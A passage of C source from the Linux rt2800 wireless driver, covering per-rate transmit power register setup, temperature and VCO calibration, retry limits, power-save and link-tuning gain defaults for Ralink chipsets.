txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_OFDM54_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_OFDM54_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_OFDM54_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 2, &eeprom);
/* MCS 0,1 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_MCS0_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_MCS0_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_EXT_IDX],
TX_PWR_CFG_1_EXT_MCS0_CH2, txpower);
/* MCS 2,3 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_MCS2_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_MCS2_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_EXT_IDX],
TX_PWR_CFG_1_EXT_MCS2_CH2, txpower);
/* MCS 4,5 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS4_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS4_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_EXT_IDX],
TX_PWR_CFG_2_EXT_MCS4_CH2, txpower);
/* MCS 6 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS6_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS6_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_EXT_IDX],
TX_PWR_CFG_2_EXT_MCS6_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 3, &eeprom);
/* MCS 7 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_MCS7_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_MCS7_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_MCS7_CH2, txpower);
/* MCS 8,9 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS8_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS8_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_EXT_IDX],
TX_PWR_CFG_2_EXT_MCS8_CH2, txpower);
/* MCS 10,11 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS10_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS10_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_EXT_IDX],
TX_PWR_CFG_2_EXT_MCS10_CH2, txpower);
/* MCS 12,13 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_MCS12_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_MCS12_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_EXT_IDX],
TX_PWR_CFG_3_EXT_MCS12_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 4, &eeprom);
/* MCS 14 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_MCS14_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_MCS14_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_EXT_IDX],
TX_PWR_CFG_3_EXT_MCS14_CH2, txpower);
/* MCS 15 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS15_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS15_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS15_CH2, txpower);
/* MCS 16,17 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS16_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS16_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS16_CH2, txpower);
/* MCS 18,19 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS18_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS18_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS18_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 5, &eeprom);
/* MCS 20,21 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS20_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS20_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS20_CH2, txpower);
/* MCS 22 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS22_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS22_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS22_CH2, txpower);
/* MCS 23 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS23_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS23_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS23_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 6, &eeprom);
/* STBC, MCS 0,1 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_STBC0_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_STBC0_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_EXT_IDX],
TX_PWR_CFG_3_EXT_STBC0_CH2, txpower);
/* STBC, MCS 2,3 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_STBC2_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_STBC2_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_EXT_IDX],
TX_PWR_CFG_3_EXT_STBC2_CH2, txpower);
/* STBC, MCS 4,5 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_4_IDX], TX_PWR_CFG_RATE0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_4_IDX], TX_PWR_CFG_RATE1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_4_EXT_IDX], TX_PWR_CFG_RATE0,
txpower);
/* STBC, MCS 6 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_4_IDX], TX_PWR_CFG_RATE2, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_4_IDX], TX_PWR_CFG_RATE3, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_4_EXT_IDX], TX_PWR_CFG_RATE2,
txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 7, &eeprom);
/* STBC, MCS 7 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_9_IDX],
TX_PWR_CFG_9_STBC7_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_9_IDX],
TX_PWR_CFG_9_STBC7_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_9_IDX],
TX_PWR_CFG_9_STBC7_CH2, txpower);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_0, regs[TX_PWR_CFG_0_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_1, regs[TX_PWR_CFG_1_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_2, regs[TX_PWR_CFG_2_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_3, regs[TX_PWR_CFG_3_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_4, regs[TX_PWR_CFG_4_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_5, regs[TX_PWR_CFG_5_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_6, regs[TX_PWR_CFG_6_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_7, regs[TX_PWR_CFG_7_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_8, regs[TX_PWR_CFG_8_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_9, regs[TX_PWR_CFG_9_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_0_EXT,
regs[TX_PWR_CFG_0_EXT_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_1_EXT,
regs[TX_PWR_CFG_1_EXT_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_2_EXT,
regs[TX_PWR_CFG_2_EXT_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_3_EXT,
regs[TX_PWR_CFG_3_EXT_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_4_EXT,
regs[TX_PWR_CFG_4_EXT_IDX]);
for (i = 0; i < TX_PWR_CFG_IDX_COUNT; i++)
rt2x00_dbg(rt2x00dev,
"band:%cGHz, BW:%c0MHz, TX_PWR_CFG_%d%s = %08lx\n",
(band == IEEE80211_BAND_5GHZ) ? '5' : '2',
(test_bit(CONFIG_CHANNEL_HT40, &rt2x00dev->flags)) ?
'4' : '2',
(i > TX_PWR_CFG_9_IDX) ?
(i - TX_PWR_CFG_9_IDX - 1) : i,
(i > TX_PWR_CFG_9_IDX) ? "_EXT" : "",
(unsigned long) regs[i]);
}
/*
 * We configure transmit power using MAC TX_PWR_CFG_{0,...,N} registers and
 * BBP R1 register. TX_PWR_CFG_X allow to configure per rate TX power values,
 * 4 bits for each rate (tune from 0 to 15 dBm). BBP_R1 controls transmit power
 * for all rates, but allow to set only 4 discrete values: -12, -6, 0 and 6 dBm.
 * Reference per rate transmit power values are located in the EEPROM at
 * EEPROM_TXPOWER_BYRATE offset. We adjust them and BBP R1 settings according to
 * current conditions (i.e. band, bandwidth, temperature, user settings).
 */
static void rt2800_config_txpower_rt28xx(struct rt2x00_dev *rt2x00dev,
					 struct ieee80211_channel *chan,
					 int power_level)
{
	u8 txpower, r1;
	u16 eeprom;
	u32 reg, offset;
	int i, is_rate_b, delta, power_ctrl;
	enum ieee80211_band band = chan->band;

	/*
	 * Calculate HT40 compensation. For 40MHz we need to add or subtract
	 * value read from EEPROM (different for 2GHz and for 5GHz).
	 */
	delta = rt2800_get_txpower_bw_comp(rt2x00dev, band);

	/*
	 * Calculate temperature compensation. Depends on measurement of current
	 * TSSI (Transmitter Signal Strength Indication) we know TX power (due
	 * to temperature or maybe other factors) is smaller or bigger than
	 * expected. We adjust it, based on TSSI reference and boundaries values
	 * provided in EEPROM.
	 */
	switch (rt2x00dev->chip.rt) {
	case RT2860:
	case RT2872:
	case RT2883:
	case RT3070:
	case RT3071:
	case RT3090:
	case RT3572:
		delta += rt2800_get_gain_calibration_delta(rt2x00dev);
		break;
	default:
		/* TODO: temperature compensation code for other chips. */
		break;
	}

	/*
	 * Decrease power according to user settings, on devices with unknown
	 * maximum tx power. For other devices we take user power_level into
	 * consideration on rt2800_compensate_txpower().
	 */
	delta += rt2800_get_txpower_reg_delta(rt2x00dev, power_level,
					      chan->max_power);

	/*
	 * BBP_R1 controls TX power for all rates, it allow to set the following
	 * gains -12, -6, 0, +6 dBm by setting values 2, 1, 0, 3 respectively.
	 *
	 * TODO: we do not use +6 dBm option to do not increase power beyond
	 * regulatory limit, however this could be utilized for devices with
	 * CAPABILITY_POWER_LIMIT.
	 */
	if (delta <= -12) {
		power_ctrl = 2;
		delta += 12;
	} else if (delta <= -6) {
		power_ctrl = 1;
		delta += 6;
	} else {
		power_ctrl = 0;
	}
	rt2800_bbp_read(rt2x00dev, 1, &r1);
	rt2x00_set_field8(&r1, BBP1_TX_POWER_CTRL, power_ctrl);
	rt2800_bbp_write(rt2x00dev, 1, r1);

	offset = TX_PWR_CFG_0;

	for (i = 0; i < EEPROM_TXPOWER_BYRATE_SIZE; i += 2) {
		/* just to be safe */
		if (offset > TX_PWR_CFG_4)
			break;

		rt2800_register_read(rt2x00dev, offset, &reg);

		/* read the next four txpower values */
		rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
					      i, &eeprom);

		/* only the first EEPROM word carries 802.11b CCK rates */
		is_rate_b = i ? 0 : 1;
		/*
		 * TX_PWR_CFG_0: 1MBS, TX_PWR_CFG_1: 24MBS,
		 * TX_PWR_CFG_2: MCS4, TX_PWR_CFG_3: MCS12,
		 * TX_PWR_CFG_4: unknown
		 */
		txpower = rt2x00_get_field16(eeprom,
					     EEPROM_TXPOWER_BYRATE_RATE0);
		txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
					     power_level, txpower, delta);
		rt2x00_set_field32(&reg, TX_PWR_CFG_RATE0, txpower);

		/*
		 * TX_PWR_CFG_0: 2MBS, TX_PWR_CFG_1: 36MBS,
		 * TX_PWR_CFG_2: MCS5, TX_PWR_CFG_3: MCS13,
		 * TX_PWR_CFG_4: unknown
		 */
		txpower = rt2x00_get_field16(eeprom,
					     EEPROM_TXPOWER_BYRATE_RATE1);
		txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
					     power_level, txpower, delta);
		rt2x00_set_field32(&reg, TX_PWR_CFG_RATE1, txpower);

		/*
		 * TX_PWR_CFG_0: 5.5MBS, TX_PWR_CFG_1: 48MBS,
		 * TX_PWR_CFG_2: MCS6, TX_PWR_CFG_3: MCS14,
		 * TX_PWR_CFG_4: unknown
		 */
		txpower = rt2x00_get_field16(eeprom,
					     EEPROM_TXPOWER_BYRATE_RATE2);
		txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
					     power_level, txpower, delta);
		rt2x00_set_field32(&reg, TX_PWR_CFG_RATE2, txpower);

		/*
		 * TX_PWR_CFG_0: 11MBS, TX_PWR_CFG_1: 54MBS,
		 * TX_PWR_CFG_2: MCS7, TX_PWR_CFG_3: MCS15,
		 * TX_PWR_CFG_4: unknown
		 */
		txpower = rt2x00_get_field16(eeprom,
					     EEPROM_TXPOWER_BYRATE_RATE3);
		txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
					     power_level, txpower, delta);
		rt2x00_set_field32(&reg, TX_PWR_CFG_RATE3, txpower);

		/* read the next four txpower values */
		rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
					      i + 1, &eeprom);

		is_rate_b = 0;
		/*
		 * TX_PWR_CFG_0: 6MBS, TX_PWR_CFG_1: MCS0,
		 * TX_PWR_CFG_2: MCS8, TX_PWR_CFG_3: unknown,
		 * TX_PWR_CFG_4: unknown
		 */
		txpower = rt2x00_get_field16(eeprom,
					     EEPROM_TXPOWER_BYRATE_RATE0);
		txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
					     power_level, txpower, delta);
		rt2x00_set_field32(&reg, TX_PWR_CFG_RATE4, txpower);

		/*
		 * TX_PWR_CFG_0: 9MBS, TX_PWR_CFG_1: MCS1,
		 * TX_PWR_CFG_2: MCS9, TX_PWR_CFG_3: unknown,
		 * TX_PWR_CFG_4: unknown
		 */
		txpower = rt2x00_get_field16(eeprom,
					     EEPROM_TXPOWER_BYRATE_RATE1);
		txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
					     power_level, txpower, delta);
		rt2x00_set_field32(&reg, TX_PWR_CFG_RATE5, txpower);

		/*
		 * TX_PWR_CFG_0: 12MBS, TX_PWR_CFG_1: MCS2,
		 * TX_PWR_CFG_2: MCS10, TX_PWR_CFG_3: unknown,
		 * TX_PWR_CFG_4: unknown
		 */
		txpower = rt2x00_get_field16(eeprom,
					     EEPROM_TXPOWER_BYRATE_RATE2);
		txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
					     power_level, txpower, delta);
		rt2x00_set_field32(&reg, TX_PWR_CFG_RATE6, txpower);

		/*
		 * TX_PWR_CFG_0: 18MBS, TX_PWR_CFG_1: MCS3,
		 * TX_PWR_CFG_2: MCS11, TX_PWR_CFG_3: unknown,
		 * TX_PWR_CFG_4: unknown
		 */
		txpower = rt2x00_get_field16(eeprom,
					     EEPROM_TXPOWER_BYRATE_RATE3);
		txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
					     power_level, txpower, delta);
		rt2x00_set_field32(&reg, TX_PWR_CFG_RATE7, txpower);

		rt2800_register_write(rt2x00dev, offset, reg);

		/* next TX_PWR_CFG register */
		offset += 4;
	}
}
/*
 * Dispatch TX power configuration to the chip-specific implementation:
 * RT3593 has a dedicated 3-chain routine, everything else uses the
 * generic rt28xx path.
 */
static void rt2800_config_txpower(struct rt2x00_dev *rt2x00dev,
				  struct ieee80211_channel *chan,
				  int power_level)
{
	if (!rt2x00_rt(rt2x00dev, RT3593)) {
		rt2800_config_txpower_rt28xx(rt2x00dev, chan, power_level);
		return;
	}

	rt2800_config_txpower_rt3593(rt2x00dev, chan, power_level);
}
/*
 * Re-run TX power configuration for the current channel; called
 * periodically so temperature-dependent gain drift gets compensated.
 */
void rt2800_gain_calibration(struct rt2x00_dev *rt2x00dev)
{
	struct ieee80211_channel *chan = rt2x00dev->hw->conf.chandef.chan;

	rt2800_config_txpower(rt2x00dev, chan, rt2x00dev->tx_power);
}
EXPORT_SYMBOL_GPL(rt2800_gain_calibration);
/*
 * A voltage-controlled oscillator(VCO) is an electronic oscillator
 * designed to be controlled in oscillation frequency by a voltage
 * input. Maybe the temperature will affect the frequency of
 * oscillation to be shifted. The VCO calibration will be called
 * periodically to adjust the frequency to be precision.
 */
void rt2800_vco_calibration(struct rt2x00_dev *rt2x00dev)
{
	u32 tx_pin;
	u8 rfcsr;
	u8 chains;

	/* Disable the PA/PE pins while the calibration runs. */
	rt2800_register_read(rt2x00dev, TX_PIN_CFG, &tx_pin);
	tx_pin &= TX_PIN_CFG_PA_PE_DISABLE;
	rt2800_register_write(rt2x00dev, TX_PIN_CFG, tx_pin);

	/* Trigger the RF-chip-specific VCO calibration bit. */
	switch (rt2x00dev->chip.rf) {
	case RF2020:
	case RF3020:
	case RF3021:
	case RF3022:
	case RF3320:
	case RF3052:
		rt2800_rfcsr_read(rt2x00dev, 7, &rfcsr);
		rt2x00_set_field8(&rfcsr, RFCSR7_RF_TUNING, 1);
		rt2800_rfcsr_write(rt2x00dev, 7, rfcsr);
		break;
	case RF3053:
	case RF3070:
	case RF3290:
	case RF5360:
	case RF5362:
	case RF5370:
	case RF5372:
	case RF5390:
	case RF5392:
		rt2800_rfcsr_read(rt2x00dev, 3, &rfcsr);
		rt2x00_set_field8(&rfcsr, RFCSR3_VCOCAL_EN, 1);
		rt2800_rfcsr_write(rt2x00dev, 3, rfcsr);
		break;
	default:
		/* RF chip without VCO calibration support. */
		return;
	}

	mdelay(1);

	/* Re-enable the PA/PE pins for every active TX chain. */
	rt2800_register_read(rt2x00dev, TX_PIN_CFG, &tx_pin);
	chains = rt2x00dev->default_ant.tx_chain_num;

	if (rt2x00dev->rf_channel <= 14) {
		if (chains >= 3)
			rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G2_EN, 1);
		if (chains >= 2)
			rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G1_EN, 1);
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_G0_EN, 1);
	} else {
		if (chains >= 3)
			rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A2_EN, 1);
		if (chains >= 2)
			rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A1_EN, 1);
		rt2x00_set_field32(&tx_pin, TX_PIN_CFG_PA_PE_A0_EN, 1);
	}

	rt2800_register_write(rt2x00dev, TX_PIN_CFG, tx_pin);
}
EXPORT_SYMBOL_GPL(rt2800_vco_calibration);
/*
 * Program the short/long frame retry limits from the mac80211
 * configuration into the TX_RTY_CFG register.
 */
static void rt2800_config_retry_limit(struct rt2x00_dev *rt2x00dev,
				      struct rt2x00lib_conf *libconf)
{
	u32 reg;

	rt2800_register_read(rt2x00dev, TX_RTY_CFG, &reg);
	rt2x00_set_field32(&reg, TX_RTY_CFG_SHORT_RTY_LIMIT,
			   libconf->conf->short_frame_max_tx_count);
	rt2x00_set_field32(&reg, TX_RTY_CFG_LONG_RTY_LIMIT,
			   libconf->conf->long_frame_max_tx_count);
	rt2800_register_write(rt2x00dev, TX_RTY_CFG, reg);
}
/*
 * Enter or leave power-save mode depending on IEEE80211_CONF_PS.
 * When sleeping, the auto-wakeup timer is armed so the device wakes
 * before the next expected beacon (listen_interval - 1 TBTTs).
 */
static void rt2800_config_ps(struct rt2x00_dev *rt2x00dev,
			     struct rt2x00lib_conf *libconf)
{
	enum dev_state state =
	    (libconf->conf->flags & IEEE80211_CONF_PS) ?
		STATE_SLEEP : STATE_AWAKE;
	u32 reg;

	if (state == STATE_SLEEP) {
		rt2800_register_write(rt2x00dev, AUTOWAKEUP_CFG, 0);

		rt2800_register_read(rt2x00dev, AUTOWAKEUP_CFG, &reg);
		rt2x00_set_field32(&reg, AUTOWAKEUP_CFG_AUTO_LEAD_TIME, 5);
		rt2x00_set_field32(&reg, AUTOWAKEUP_CFG_TBCN_BEFORE_WAKE,
				   libconf->conf->listen_interval - 1);
		rt2x00_set_field32(&reg, AUTOWAKEUP_CFG_AUTOWAKE, 1);
		rt2800_register_write(rt2x00dev, AUTOWAKEUP_CFG, reg);

		rt2x00dev->ops->lib->set_device_state(rt2x00dev, state);
	} else {
		rt2800_register_read(rt2x00dev, AUTOWAKEUP_CFG, &reg);
		rt2x00_set_field32(&reg, AUTOWAKEUP_CFG_AUTO_LEAD_TIME, 0);
		rt2x00_set_field32(&reg, AUTOWAKEUP_CFG_TBCN_BEFORE_WAKE, 0);
		rt2x00_set_field32(&reg, AUTOWAKEUP_CFG_AUTOWAKE, 0);
		rt2800_register_write(rt2x00dev, AUTOWAKEUP_CFG, reg);

		rt2x00dev->ops->lib->set_device_state(rt2x00dev, state);
	}
}
/*
 * Apply a mac80211 configuration change. LNA gain is recalculated first
 * because the channel and txpower paths below depend on it; a channel
 * change also reprograms txpower since per-rate power is channel/band
 * dependent.
 */
void rt2800_config(struct rt2x00_dev *rt2x00dev,
		   struct rt2x00lib_conf *libconf,
		   const unsigned int flags)
{
	/* Always recalculate LNA gain before changing configuration */
	rt2800_config_lna_gain(rt2x00dev, libconf);

	if (flags & IEEE80211_CONF_CHANGE_CHANNEL) {
		rt2800_config_channel(rt2x00dev, libconf->conf,
				      &libconf->rf, &libconf->channel);
		rt2800_config_txpower(rt2x00dev, libconf->conf->chandef.chan,
				      libconf->conf->power_level);
	}
	if (flags & IEEE80211_CONF_CHANGE_POWER)
		rt2800_config_txpower(rt2x00dev, libconf->conf->chandef.chan,
				      libconf->conf->power_level);
	if (flags & IEEE80211_CONF_CHANGE_RETRY_LIMITS)
		rt2800_config_retry_limit(rt2x00dev, libconf);
	if (flags & IEEE80211_CONF_CHANGE_PS)
		rt2800_config_ps(rt2x00dev, libconf);
}
EXPORT_SYMBOL_GPL(rt2800_config);
/*
* Link tuning
*/
/*
 * Update link quality statistics: read the FCS (CRC) error count from
 * the RX_STA_CNT0 register into qual->rx_failed.
 */
void rt2800_link_stats(struct rt2x00_dev *rt2x00dev, struct link_qual *qual)
{
	u32 reg;

	/*
	 * Update FCS error count from register.
	 */
	rt2800_register_read(rt2x00dev, RX_STA_CNT0, &reg);
	qual->rx_failed = rt2x00_get_field32(reg, RX_STA_CNT0_CRC_ERR);
}
EXPORT_SYMBOL_GPL(rt2800_link_stats);
/*
 * Return the chip- and band-specific default VGC (variable gain control)
 * value for BBP register 66, derived from the calibrated LNA gain.
 */
static u8 rt2800_get_default_vgc(struct rt2x00_dev *rt2x00dev)
{
	u8 lna = rt2x00dev->lna_gain;

	if (rt2x00dev->curr_band == IEEE80211_BAND_2GHZ) {
		switch (rt2x00dev->chip.rt) {
		case RT3070:
		case RT3071:
		case RT3090:
		case RT3290:
		case RT3390:
		case RT3572:
		case RT3593:
		case RT5390:
		case RT5392:
		case RT5592:
			return 0x1c + (2 * lna);
		default:
			return 0x2e + lna;
		}
	}

	/* 5GHZ band */
	if (rt2x00_rt(rt2x00dev, RT3593))
		return 0x20 + (lna * 5) / 3;

	if (rt2x00_rt(rt2x00dev, RT5592))
		return 0x24 + (2 * lna);

	if (test_bit(CONFIG_CHANNEL_HT40, &rt2x00dev->flags))
		return 0x3a + (lna * 5) / 3;

	return 0x32 + (lna * 5) / 3;
}
/*
 * Write a new VGC value to BBP register 66 (per RX chain where the chip
